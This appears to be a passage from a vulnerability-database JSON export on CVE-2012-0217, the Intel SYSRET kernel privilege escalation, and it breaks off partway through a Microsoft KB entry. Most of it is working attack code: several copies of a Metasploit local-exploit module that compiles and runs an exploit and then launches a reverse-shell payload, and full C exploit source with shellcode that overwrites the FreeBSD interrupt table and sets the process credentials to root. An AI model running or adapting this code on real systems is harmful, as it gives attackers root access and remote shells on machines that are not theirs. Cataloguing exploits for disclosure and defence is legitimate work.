following the X86-64 specification will\r\n trigger a general protection fault (GPF) when executing a SYSRET\r\n instruction with a non-canonical address in the RCX register.\r\n\r\n However, Intel processors check for a non-canonical address prior to\r\n dropping privileges, causing a GPF in privileged mode. As a result,\r\n the current userland RSP stack pointer is restored and executed,\r\n resulting in privileged code execution.\r\n\r\n This module has been tested successfully on:\r\n\r\n FreeBSD 8.3-RELEASE (amd64); and\r\n FreeBSD 9.0-RELEASE (amd64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Rafal Wojtczuk', # Discovery\r\n 'John Baldwin', # Discovery\r\n 'iZsh', # Exploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => '2012-06-12',\r\n 'Platform' => ['bsd'],\r\n 'Arch' => [ARCH_X64],\r\n 'SessionTypes' => ['shell'],\r\n 'References' =>\r\n [\r\n ['BID', '53856'],\r\n ['CVE', '2012-0217'],\r\n ['EDB', '28718'],\r\n ['PACKETSTORM', '113584'],\r\n ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],\r\n ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],\r\n ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],\r\n ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],\r\n ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],\r\n ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']\r\n ],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },\r\n 'DefaultTarget' => 0))\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n 
end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data, gcc_args='')\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n chmod path\r\n end\r\n\r\n def exploit_data(file)\r\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file)\r\n end\r\n\r\n def is_root?\r\n (cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0')\r\n end\r\n\r\n def strip_comments(c_code)\r\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\r\n end\r\n\r\n def check\r\n kernel_release = cmd_exec('uname -r').to_s\r\n unless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/\r\n vprint_error \"FreeBSD version #{kernel_release} is not vulnerable\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n vprint_good \"FreeBSD version #{kernel_release} appears vulnerable\"\r\n\r\n arch = cmd_exec('uname -m').to_s\r\n unless arch.include? '64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n hw_model = cmd_exec('/sbin/sysctl hw.model').to_s\r\n unless hw_model.downcase.include? 
'intel'\r\n vprint_error \"#{hw_model} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{hw_model} is vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload and compile exploit executable\r\n executable_name = \".#{rand_text_alphanumeric 5..10}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall'\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec executable_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n unless is_root?\r\n fail_with Failure::Unknown, 'Exploitation failed'\r\n end\r\n print_good \"Success! Executing payload...\"\r\n\r\n cmd_exec payload_path\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46508"}, {"lastseen": "2016-02-02T15:09:46", "description": "Microsoft Windows Kernel Intel x64 SYSRET PoC. CVE-2012-0217. 
Local exploit for win64 platform", "published": "2012-08-27T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel Intel x64 SYSRET PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2012-08-27T00:00:00", "id": "EDB-ID:20861", "href": "https://www.exploit-db.com/exploits/20861/", "sourceData": "Source: http://packetstormsecurity.org/files/115908/sysret.rar\r\n\r\nThis is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process.\r\n\r\nExploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar\r\n\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20861/"}, {"lastseen": "2016-02-03T08:46:10", "description": "FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit. CVE-2012-0217. Local exploit for freebsd platform", "published": "2013-10-04T00:00:00", "type": "exploitdb", "title": "FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2013-10-04T00:00:00", "id": "EDB-ID:28718", "href": "https://www.exploit-db.com/exploits/28718/", "sourceData": "/*\r\n * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit\r\n * Author by CurcolHekerLink\r\n * \r\n * This exploit based on open source project, I can make it open source too. Right?\r\n * \r\n * If you blaming me for open sourcing this exploit, you can fuck your mom. 
Free of charge :)\r\n *\r\n * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,\r\n * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam\r\n * if you would like next private exploit leakage, just mention @MamahhDedeh\r\n *\r\n * Some people may feel harmed when we release this exploit :))\r\n *\r\n * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <sys/mman.h>\r\n#include <machine/cpufunc.h>\r\n#define _WANT_UCRED\r\n#include <sys/proc.h>\r\n#include <machine/segments.h>\r\n#include <sys/param.h>\r\n#include <sys/linker.h>\r\n#define TRIGGERSIZE 20\r\n#define BOUNCESIZE 18\r\n\r\nuintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;\r\n\r\nstruct gate_descriptor * sidt()\r\n{\r\n\tstruct region_descriptor idt;\r\n\tasm (\"sidt %0\": \"=m\"(idt));\r\n\treturn (struct gate_descriptor*)idt.rd_base;\r\n}\r\n\r\nu_long matchsym(char *symname)\r\n{\r\n\tstruct kld_sym_lookup ksym;\r\n\tksym.version = sizeof (ksym);\r\n\tksym.symname = symname;\r\n\tif (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {\r\n\t\tperror(\"kldsym\");\r\n\t\texit(1);\r\n\t}\r\n\treturn ksym.symvalue;\r\n}\r\n\r\nvoid setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)\r\n{\r\n\tstruct gate_descriptor *ip;\r\n\tip = idt + idx;\r\n\tip->gd_looffset = func;\r\n\tip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);\r\n\tip->gd_ist = ist;\r\n\tip->gd_xx = 0;\r\n\tip->gd_type = typ;\r\n\tip->gd_dpl = dpl;\r\n\tip->gd_p = 1;\r\n\tip->gd_hioffset = func>>16;\r\n}\r\n\r\nvoid payload()\r\n{\r\n\tprintf(\"[+] Woohoo!!!\\n\");\r\n\texit(0);\r\n}\r\n\r\nvoid resetidt()\r\n{\r\n\tstruct thread *td;\r\n\tstruct ucred *cred;\r\n\tstruct 
gate_descriptor *idt = sidt();\r\n\tsetidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0);\t\r\n\tsetidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0);\r\n\tsetidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0);\r\n\t\r\n\tasm (\"mov %%gs:0, %0\" : \"=r\"(td));\r\n\t\r\n\tcred = td->td_proc->p_ucred;\r\n\tcred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;\r\n\tcred->cr_groups[0] = 0;\r\n\t\r\n\tasm (\"swapgs; sysretq;\" :: \"c\"(payload));\r\n}\r\n\r\nvoid resolving()\r\n{\r\n\tXdivp = (uintptr_t)matchsym(\"Xdiv\");\r\n\tXdbgp = (uintptr_t)matchsym(\"Xdbg\");\r\n\tXbptp = (uintptr_t)matchsym(\"Xbpt\");\r\n\tXoflp = (uintptr_t)matchsym(\"Xofl\");\r\n\tXbndp = (uintptr_t)matchsym(\"Xbnd\");\r\n\tXillp = (uintptr_t)matchsym(\"Xill\");\r\n\tXdnap = (uintptr_t)matchsym(\"Xdna\");\r\n\tXfpusegmp = (uintptr_t)matchsym(\"Xfpusegm\");\r\n\tXtssp = (uintptr_t)matchsym(\"Xtss\");\r\n\tXmissingp = (uintptr_t)matchsym(\"Xmissing\");\r\n\tXstkp = (uintptr_t)matchsym(\"Xstk\");\r\n\tXprotp = (uintptr_t)matchsym(\"Xprot\");\r\n\tXpagep = (uintptr_t)matchsym(\"Xpage\");\r\n\tXfpup = (uintptr_t)matchsym(\"Xfpu\");\r\n\tXalignp = (uintptr_t)matchsym(\"Xalign\");\r\n\tXmchkp = 
(uintptr_t)matchsym(\"Xmchk\");\r\n\tXxmmp = (uintptr_t)matchsym(\"Xxmm\");\r\n}\r\n\r\nvoid trigger()\r\n{\r\n\tprintf(\"[+] Crotz...\\n\");\r\n\tuint64_t pagesize = getpagesize();\r\n\tuint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize);\r\n\tmappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);\r\n\tif (mappedarea == MAP_FAILED) {\r\n\t\tperror(\"mmap (trigger)\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tchar triggerpayload[] =\r\n\t\t\"\\xb8\\x18\\x00\\x00\\x00\"\r\n\t\t\"\\x48\\x89\\xe3\"\r\n\t\t\"\\x48\\xbc\\xef\\xbe\\xad\\xde\\xef\\xbe\\xad\\xde\"\r\n\t\t\"\\x0f\\x05\";\r\n\r\n\tuint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;\r\n\tmemcpy(offset_addr, triggerpayload, TRIGGERSIZE);\r\n\r\n\t*(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);\r\n\tprintf(\"[+] Crotz...\\n\");\r\n\tchar bouncepayload[] =\r\n\t\t\"\\x0f\\x01\\xf8\"\r\n\t\t\"\\x48\\x89\\xdc\"\r\n\t\t\"\\x48\\xb8\\xef\\xbe\\xad\\xde\\xef\\xbe\\xad\\xde\"\r\n\t\t\"\\xff\\xe0\";\r\n\r\n\tuint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));\r\n\tsize_t bouncer_allocsize = pagesize;\r\n\tif ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE)\r\n\t\tbouncer_allocsize += pagesize;\r\n\tif (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)\r\n\t{\r\n\t\tperror(\"mmap (bouncer)\");\r\n\t\texit(1);\r\n\t}\r\n\tmemcpy(bouncer, bouncepayload, BOUNCESIZE);\r\n\t*(uint64_t*)(bouncer + 8) = (uint64_t)resetidt;\r\n\t((void (*)())offset_addr)();\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tprintf(\"[+] SYSRET FUCKUP!!\\n\");\r\n\tprintf(\"[+] Start Engine...\\n\");\r\n\tresolving();\r\n\tprintf(\"[+] Crotz...\\n\");\r\n\ttrigger();\r\n\treturn 0;\r\n}\r\n", "cvss": {"score": 7.2, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/28718/"}], "packetstorm": [{"lastseen": "2019-03-07T11:22:21", "description": "", "published": "2019-03-07T00:00:00", "type": "packetstorm", "title": "FreeBSD Intel SYSRET Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2019-03-07T00:00:00", "id": "PACKETSTORM:152001", "href": "https://packetstormsecurity.com/files/152001/FreeBSD-Intel-SYSRET-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'FreeBSD Intel SYSRET Privilege Escalation', \n'Description' => %q{ \nThis module exploits a vulnerability in the FreeBSD kernel, \nwhen running on 64-bit Intel processors. \n \nBy design, 64-bit processors following the X86-64 specification will \ntrigger a general protection fault (GPF) when executing a SYSRET \ninstruction with a non-canonical address in the RCX register. \n \nHowever, Intel processors check for a non-canonical address prior to \ndropping privileges, causing a GPF in privileged mode. As a result, \nthe current userland RSP stack pointer is restored and executed, \nresulting in privileged code execution. \n \nThis module has been tested successfully on: \n \nFreeBSD 8.3-RELEASE (amd64); and \nFreeBSD 9.0-RELEASE (amd64). 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Rafal Wojtczuk', # Discovery \n'John Baldwin', # Discovery \n'iZsh', # Exploit \n'bcoles' # Metasploit \n], \n'DisclosureDate' => '2012-06-12', \n'Platform' => ['bsd'], \n'Arch' => [ARCH_X64], \n'SessionTypes' => ['shell'], \n'References' => \n[ \n['BID', '53856'], \n['CVE', '2012-0217'], \n['EDB', '28718'], \n['PACKETSTORM', '113584'], \n['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'], \n['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'], \n['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'], \n['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'], \n['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'], \n['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation'] \n], \n'Targets' => \n[ \n['Automatic', {}] \n], \n'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' }, \n'DefaultTarget' => 0)) \nregister_advanced_options [ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef upload_and_compile(path, data, gcc_args='') \nupload \"#{path}.c\", data \n \ngcc_cmd = \"gcc -o #{path} #{path}.c\" \nif session.type.eql? 'shell' \ngcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\" \nend \noutput = cmd_exec gcc_cmd \n \nunless output.blank? 
\nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile\" \nend \n \nregister_file_for_cleanup path \nchmod path \nend \n \ndef exploit_data(file) \n::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file) \nend \n \ndef is_root? \n(cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0') \nend \n \ndef strip_comments(c_code) \nc_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '') \nend \n \ndef check \nkernel_release = cmd_exec('uname -r').to_s \nunless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/ \nvprint_error \"FreeBSD version #{kernel_release} is not vulnerable\" \nreturn Exploit::CheckCode::Safe \nend \nvprint_good \"FreeBSD version #{kernel_release} appears vulnerable\" \n \narch = cmd_exec('uname -m').to_s \nunless arch.include? '64' \nvprint_error \"System architecture #{arch} is not supported\" \nreturn CheckCode::Safe \nend \nvprint_good \"System architecture #{arch} is supported\" \n \nhw_model = cmd_exec('/sbin/sysctl hw.model').to_s \nunless hw_model.downcase.include? 'intel' \nvprint_error \"#{hw_model} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"#{hw_model} is vulnerable\" \n \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nunless datastore['ForceExploit'] \nfail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' \nend \nprint_warning 'Target does not appear to be vulnerable' \nend \n \nif is_root? \nunless datastore['ForceExploit'] \nfail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' \nend \nend \n \nunless writable? 
base_dir \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# Upload and compile exploit executable \nexecutable_name = \".#{rand_text_alphanumeric 5..10}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nupload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall' \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Launch exploit \nprint_status 'Launching exploit...' \noutput = cmd_exec executable_path \noutput.each_line { |line| vprint_status line.chomp } \n \nunless is_root? \nfail_with Failure::Unknown, 'Exploitation failed' \nend \nprint_good \"Success! Executing payload...\" \n \ncmd_exec payload_path \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152001/intel_sysret_priv_esc.rb.txt"}], "metasploit": [{"lastseen": "2020-10-01T22:09:55", "description": "This module exploits a vulnerability in the FreeBSD kernel, when running on 64-bit Intel processors. By design, 64-bit processors following the X86-64 specification will trigger a general protection fault (GPF) when executing a SYSRET instruction with a non-canonical address in the RCX register. However, Intel processors check for a non-canonical address prior to dropping privileges, causing a GPF in privileged mode. As a result, the current userland RSP stack pointer is restored and executed, resulting in privileged code execution. 
This module has been tested successfully on: FreeBSD 8.3-RELEASE (amd64); and FreeBSD 9.0-RELEASE (amd64).\n", "published": "2018-12-09T16:04:38", "type": "metasploit", "title": "FreeBSD Intel SYSRET Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2020-07-18T23:31:34", "id": "MSF:EXPLOIT/FREEBSD/LOCAL/INTEL_SYSRET_PRIV_ESC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::File\n include Msf::Post::Unix\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',\n 'Description' => %q{\n This module exploits a vulnerability in the FreeBSD kernel,\n when running on 64-bit Intel processors.\n\n By design, 64-bit processors following the X86-64 specification will\n trigger a general protection fault (GPF) when executing a SYSRET\n instruction with a non-canonical address in the RCX register.\n\n However, Intel processors check for a non-canonical address prior to\n dropping privileges, causing a GPF in privileged mode. 
As a result,\n the current userland RSP stack pointer is restored and executed,\n resulting in privileged code execution.\n\n This module has been tested successfully on:\n\n FreeBSD 8.3-RELEASE (amd64); and\n FreeBSD 9.0-RELEASE (amd64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Rafal Wojtczuk', # Discovery\n 'John Baldwin', # Discovery\n 'iZsh', # Exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2012-06-12',\n 'Platform' => ['bsd'], # FreeBSD\n 'Arch' => [ARCH_X64],\n 'SessionTypes' => ['shell'],\n 'References' =>\n [\n ['BID', '53856'],\n ['CVE', '2012-0217'],\n ['EDB', '28718'],\n ['PACKETSTORM', '113584'],\n ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],\n ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],\n ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],\n ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],\n ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],\n ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']\n ],\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },\n 'DefaultTarget' => 0\n )\n )\n register_advanced_options([\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ])\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status(\"Writing '#{path}' (#{data.size} bytes) ...\")\n rm_f(path)\n write_file(path, data)\n register_file_for_cleanup(path)\n end\n\n def upload_and_compile(path, data, _cc_args = '')\n upload(\"#{path}.c\", data)\n\n cc_cmd = \"cc -o #{path} #{path}.c\"\n if session.type.eql?('shell')\n cc_cmd = \"PATH=$PATH:/usr/bin/ #{cc_cmd}\"\n end\n output = cmd_exec(cc_cmd)\n\n unless output.blank?\n print_error(output)\n 
fail_with(Failure::Unknown, \"#{path}.c failed to compile\")\n end\n\n register_file_for_cleanup(path)\n chmod(path)\n end\n\n def strip_comments(c_code)\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\n end\n\n def check\n kernel_release = cmd_exec('uname -r').to_s\n unless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/\n return CheckCode::Safe(\"FreeBSD version #{kernel_release} is not vulnerable\")\n end\n vprint_good(\"FreeBSD version #{kernel_release} appears vulnerable\")\n\n kernel_arch = cmd_exec('uname -m').to_s\n unless kernel_arch.include?('64')\n return CheckCode::Safe(\"System architecture #{kernel_arch} is not supported\")\n end\n vprint_good(\"System architecture #{kernel_arch} is supported\")\n\n hw_model = cmd_exec('/sbin/sysctl hw.model').to_s\n unless hw_model.downcase.include?('intel')\n return CheckCode::Safe(\"#{hw_model} is not vulnerable\")\n end\n vprint_good(\"#{hw_model} is vulnerable\")\n\n CheckCode::Appears\n end\n\n def exploit\n if is_root?\n unless datastore['ForceExploit']\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\n end\n end\n\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n # Upload and compile exploit executable\n executable_name = \".#{rand_text_alphanumeric(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n upload_and_compile(executable_path, strip_comments(exploit_data('cve-2012-0217', 'sysret.c')), '-Wall')\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n upload_and_chmodx(payload_path, generate_payload_exe)\n\n # Launch exploit\n print_status('Launching exploit...')\n output = cmd_exec(executable_path)\n output.each_line { |line| vprint_status line.chomp }\n\n unless is_root?\n fail_with(Failure::Unknown, 'Exploitation failed')\n end\n print_good('Success! 
Executing payload...')\n\n cmd_exec(\"#{payload_path} & echo \")\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/freebsd/local/intel_sysret_priv_esc.rb"}], "mskb": [{"lastseen": "2021-01-01T22:53:09", "bulletinFamily": "microsoft", "cvelist": ["CVE-2012-0217", "CVE-2012-1515"], "description": "<html><body><p>Resolves vulnerabilities in Microsoft Windows that could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that exploits the vulnerability. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-042. To view the complete security bulletin, visit one of the following Microsoft websites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201206.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201206.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-042\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-042</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a 
